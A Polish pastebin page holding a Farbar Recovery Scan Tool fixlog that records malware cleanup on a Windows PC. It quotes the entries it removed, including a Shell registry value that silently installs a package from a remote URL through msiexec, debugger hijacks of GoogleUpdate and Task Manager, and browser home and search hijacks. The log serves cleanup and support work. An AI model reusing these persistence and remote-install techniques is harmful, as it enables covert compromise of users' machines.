wklejto.pl

Dodane przez: ~Anonim (2017-06-22 22:42) -> text
1.
2.
3.
4.
5.
6.
7.
8.
9.
10.
11.
12.
13.
14.
15.
16.
17.
18.
19.
20.
21.
22.
23.
24.
25.
26.
27.
28.
29.
30.
31.
32.
33.
34.
35.
36.
37.
38.
39.
40.
41.
42.
43.
44.
45.
46.
47.
48.
49.
50.
51.
52.
53.
54.
55.
56.
57.
58.
59.
60.
61.
62.
63.
64.
65.
66.
67.
68.
69.
70.
71.
72.
73.
74.
75.
76.
77.
78.
79.
80.
81.
82.
83.
84.
85.
86.
87.
88.
89.
90.
91.
92.
93.
94.
95.
96.
97.
98.
99.
100.
101.
102.
103.
104.
105.
106.
107.
108.
109.
110.
111.
112.
113.
114.
115.
116.
117.
Rezultat naprawy Farbar Recovery Scan Tool (x64) Wersja: 21-06-2017 01
Uruchomiony przez Beata (22-06-2017 22:38:09) Run:1
Uruchomiony z C:\Users\Beata\Downloads\FRST-OlderVersion
Załadowane profile: defaultuser0 & Beata (Dostępne profile: defaultuser0 & Beata)
Tryb startu: Normal
==============================================
 
fixlist - zawartość:
*****************
CloseProcesses:
 
C:\Windows\KMS-R@1n.exe
 
HKU\S-1-5-21-4154965311-55385270-3539469186-1001\...\Policies\system: [Shell] explorer.exe,msiexec.exe /i hxxp://point.ltdmsjq.com/?data=zDlkMj85FdM5FkMdOUY1FTIyRTM1MTVSOTJWOURSOWHxFkJWOH== /q <===== UWAGA
 
IFEO\GoogleUpdate.exe: [Debugger] 324095823984.exe
IFEO\GoogleUpdaterService.exe: [Debugger] 8736459873644.exe
IFEO\taskmgr.exe: [Debugger] 
HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.ourluckysites.com/?type=hp&ts=1493726609&z=f61585ccd1834ea565ba36ag1z1t4c2m0obq9qcecb&from=ypid&uid=SamsungXSSDX840XEVOX120GB_S1D5NSAF510371L
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.ourluckysites.com/?type=hp&ts=1493726609&z=f61585ccd1834ea565ba36ag1z1t4c2m0obq9qcecb&from=ypid&uid=SamsungXSSDX840XEVOX120GB_S1D5NSAF510371L
HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = hxxp://www.ourluckysites.com/search/?type=ds&ts=1493726609&z=f61585ccd1834ea565ba36ag1z1t4c2m0obq9qcecb&from=ypid&uid=SamsungXSSDX840XEVOX120GB_S1D5NSAF510371L&q={searchTerms}
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Search Page = hxxp://www.ourluckysites.com/search/?type=ds&ts=1493726609&z=f61585ccd1834ea565ba36ag1z1t4c2m0obq9qcecb&from=ypid&uid=SamsungXSSDX840XEVOX120GB_S1D5NSAF510371L&q={searchTerms}
HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://www.ourluckysites.com/?type=hp&ts=1493726609&z=f61585ccd1834ea565ba36ag1z1t4c2m0obq9qcecb&from=ypid&uid=SamsungXSSDX840XEVOX120GB_S1D5NSAF510371L
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://www.ourluckysites.com/?type=hp&ts=1493726609&z=f61585ccd1834ea565ba36ag1z1t4c2m0obq9qcecb&from=ypid&uid=SamsungXSSDX840XEVOX120GB_S1D5NSAF510371L
HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = hxxp://www.ourluckysites.com/search/?type=ds&ts=1493726609&z=f61585ccd1834ea565ba36ag1z1t4c2m0obq9qcecb&from=ypid&uid=SamsungXSSDX840XEVOX120GB_S1D5NSAF510371L&q={searchTerms}
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Search_URL = hxxp://www.ourluckysites.com/search/?type=ds&ts=1493726609&z=f61585ccd1834ea565ba36ag1z1t4c2m0obq9qcecb&from=ypid&uid=SamsungXSSDX840XEVOX120GB_S1D5NSAF510371L&q={searchTerms}
HKU\S-1-5-21-4154965311-55385270-3539469186-1001\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.ourluckysites.com/?type=hp&ts=1493726609&z=f61585ccd1834ea565ba36ag1z1t4c2m0obq9qcecb&from=ypid&uid=SamsungXSSDX840XEVOX120GB_S1D5NSAF510371L
HKU\S-1-5-21-4154965311-55385270-3539469186-1001\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://www.ourluckysites.com/?type=hp&ts=1493726609&z=f61585ccd1834ea565ba36ag1z1t4c2m0obq9qcecb&from=ypid&uid=SamsungXSSDX840XEVOX120GB_S1D5NSAF510371L
SearchScopes: HKLM -> DefaultScope {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = hxxp://www.ourluckysites.com/search/?type=ds&ts=1493726609&z=f61585ccd1834ea565ba36ag1z1t4c2m0obq9qcecb&from=ypid&uid=SamsungXSSDX840XEVOX120GB_S1D5NSAF510371L&q={searchTerms}
SearchScopes: HKLM -> {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = hxxp://www.ourluckysites.com/search/?type=ds&ts=1493726609&z=f61585ccd1834ea565ba36ag1z1t4c2m0obq9qcecb&from=ypid&uid=SamsungXSSDX840XEVOX120GB_S1D5NSAF510371L&q={searchTerms}
SearchScopes: HKLM-x32 -> DefaultScope {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = hxxp://www.ourluckysites.com/search/?type=ds&ts=1493726609&z=f61585ccd1834ea565ba36ag1z1t4c2m0obq9qcecb&from=ypid&uid=SamsungXSSDX840XEVOX120GB_S1D5NSAF510371L&q={searchTerms}
SearchScopes: HKLM-x32 -> {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = hxxp://www.ourluckysites.com/search/?type=ds&ts=1493726609&z=f61585ccd1834ea565ba36ag1z1t4c2m0obq9qcecb&from=ypid&uid=SamsungXSSDX840XEVOX120GB_S1D5NSAF510371L&q={searchTerms}
SearchScopes: HKU\S-1-5-21-4154965311-55385270-3539469186-1001 -> DefaultScope {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = hxxp://www.ourluckysites.com/search/?type=ds&ts=1493726609&z=f61585ccd1834ea565ba36ag1z1t4c2m0obq9qcecb&from=ypid&uid=SamsungXSSDX840XEVOX120GB_S1D5NSAF510371L&q={searchTerms}
SearchScopes: HKU\S-1-5-21-4154965311-55385270-3539469186-1001 -> {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = hxxp://www.ourluckysites.com/search/?type=ds&ts=1493726609&z=f61585ccd1834ea565ba36ag1z1t4c2m0obq9qcecb&from=ypid&uid=SamsungXSSDX840XEVOX120GB_S1D5NSAF510371L&q={searchTerms}
FF ProfilePath: C:\Users\Beata\AppData\Roaming\Firefox\Firefox\Profiles\10h3e2nq.default [2017-05-31] <==== UWAGA
FF DefaultProfile: evhfedm2.default
FF DefaultProfile: 10h3e2nq.default
HKU\S-1-5-21-4154965311-55385270-3539469186-1001\...\StartMenuInternet\ChromeHTML: -> C:\Program Files (x86)\Dohat\Application\chrome.exe <==== UWAGA
S2 BIT; C:\ProgramData\BIT\BIT.dll [1812992 2017-06-08] () [Brak podpisu cyfrowego] <==== UWAGA
S4 snare; C:\Users\Beata\AppData\Local\snare\Snare.dll [1050112 2017-06-08] () [Brak podpisu cyfrowego] <==== UWAGA
S3 gupdatem; "C:\Program Files (x86)\Google\Update\GoogleUpdate.exe" /medsvc [X]
C:\Users\Beata\AppData\Local\background_fault\aswRD.exe
C:\ProgramData\DP45977C.lfl
EmptyTemp:
*****************
 
Procesy zostały pomyślnie zamknięte.
C:\Windows\KMS-R@1n.exe => pomyślnie przeniesiono
HKU\S-1-5-21-4154965311-55385270-3539469186-1001\Software\Microsoft\Windows\CurrentVersion\Policies\system\\Shell => Wartość pomyślnie usunięto
HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\GoogleUpdate.exe => klucz pomyślnie usunięto
HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\GoogleUpdaterService.exe => klucz pomyślnie usunięto
HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\taskmgr.exe => klucz pomyślnie usunięto
HKLM\Software\\Microsoft\Internet Explorer\Main\\Start Page => Wartość pomyślnie przywrócono
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main\\Start Page => Wartość pomyślnie przywrócono
HKLM\Software\\Microsoft\Internet Explorer\Main\\Search Page => Wartość pomyślnie przywrócono
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main\\Search Page => Wartość pomyślnie przywrócono
HKLM\Software\\Microsoft\Internet Explorer\Main\\Default_Page_URL => Wartość pomyślnie przywrócono
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main\\Default_Page_URL => Wartość pomyślnie przywrócono
HKLM\Software\\Microsoft\Internet Explorer\Main\\Default_Search_URL => Wartość pomyślnie przywrócono
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main\\Default_Search_URL => Wartość pomyślnie przywrócono
HKU\S-1-5-21-4154965311-55385270-3539469186-1001\Software\Microsoft\Internet Explorer\Main\\Start Page => Wartość pomyślnie przywrócono
HKU\S-1-5-21-4154965311-55385270-3539469186-1001\Software\Microsoft\Internet Explorer\Main\\Default_Page_URL => Wartość pomyślnie przywrócono
HKLM\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\\DefaultScope => Wartość pomyślnie przywrócono
HKLM\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{33BB0A4E-99AF-4226-BDF6-49120163DE86} => klucz pomyślnie usunięto
HKLM\Software\Classes\CLSID\{33BB0A4E-99AF-4226-BDF6-49120163DE86} => klucz nie znaleziono. 
HKLM\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\SearchScopes\\DefaultScope => Wartość pomyślnie przywrócono
HKLM\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\SearchScopes\{33BB0A4E-99AF-4226-BDF6-49120163DE86} => klucz pomyślnie usunięto
HKLM\Software\Wow6432Node\Classes\CLSID\{33BB0A4E-99AF-4226-BDF6-49120163DE86} => klucz nie znaleziono. 
HKU\S-1-5-21-4154965311-55385270-3539469186-1001\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\\DefaultScope => Wartość pomyślnie usunięto
HKU\S-1-5-21-4154965311-55385270-3539469186-1001\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{33BB0A4E-99AF-4226-BDF6-49120163DE86} => klucz pomyślnie usunięto
HKLM\Software\Classes\CLSID\{33BB0A4E-99AF-4226-BDF6-49120163DE86} => klucz nie znaleziono. 
C:\Users\Beata\AppData\Roaming\Firefox\Firefox\Profiles\10h3e2nq.default => pomyślnie przeniesiono
C:\Users\Beata\AppData\Roaming\Firefox\Firefox\Profiles\10h3e2nq.default => ścieżki pomyślnie usunięto
FF DefaultProfile: evhfedm2.default => Błąd: Nie znaleziono automatycznej naprawy dla tego wejścia.
FF DefaultProfile: 10h3e2nq.default => Błąd: Nie znaleziono automatycznej naprawy dla tego wejścia.
HKU\S-1-5-21-4154965311-55385270-3539469186-1001\SOFTWARE\Clients\StartMenuInternet\ChromeHTML => klucz pomyślnie usunięto
HKLM\System\CurrentControlSet\Services\BIT => klucz pomyślnie usunięto
BIT => serwis pomyślnie usunięto
HKLM\System\CurrentControlSet\Services\snare => klucz pomyślnie usunięto
snare => serwis pomyślnie usunięto
HKLM\System\CurrentControlSet\Services\gupdatem => klucz pomyślnie usunięto
gupdatem => serwis pomyślnie usunięto
C:\Users\Beata\AppData\Local\background_fault\aswRD.exe => pomyślnie przeniesiono
C:\ProgramData\DP45977C.lfl => pomyślnie przeniesiono
 
=========== EmptyTemp: ==========
 
BITS transfer queue => 0 B
DOMStore, IE Recovery, AppCache, Feeds Cache, Thumbcache, IconCache => 29885475 B
Java, Flash, Steam htmlcache => 492 B
Windows/system/drivers => 2190398 B
Edge => 5816 B
Chrome => 0 B
Firefox => 376623704 B
Opera => 115712 B
 
Temp, IE cache, history, cookies, recent:
Default => 0 B
Users => 0 B
ProgramData => 0 B
Public => 0 B
systemprofile => 952 B
systemprofile32 => 53890051 B
LocalService => 4122 B
NetworkService => 0 B
defaultuser0 => 128 B
Beata => 167270452 B
 
RecycleBin => 5574042 B
EmptyTemp: => 606.1 MB danych tymczasowych Usunięto.
 
================================
 
 
System wymagał restartu.
 
==== Koniec  Fixlog 22:38:38 ====
Wygenerowano w 0.015s, przy pomocy GeSHi 1.0.8
'
Podziel się na Facebook Podziel się na BLIP Podziel się na Twitter Podziel się na Buzz Podziel się na Flaker Dodaj zakładkę Google Podziel się na Delicious Wykop to!

Nowy Komentarz:

Komentarze:

Brak Komentarzy!